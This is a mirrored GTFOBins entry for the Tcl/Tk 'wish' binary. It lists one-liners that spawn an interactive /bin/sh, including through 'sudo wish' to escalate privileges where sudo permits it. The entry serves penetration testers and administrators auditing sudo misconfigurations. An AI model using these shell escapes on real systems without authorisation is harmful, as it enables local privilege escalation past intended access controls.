mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
11 lines
209 B
Markdown
11 lines
209 B
Markdown
---
|
|
functions:
|
|
exec-interactive:
|
|
- code: |
|
|
wish
|
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
|
sudo-enabled:
|
|
- code: |
|
|
sudo wish
|
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
|
--- |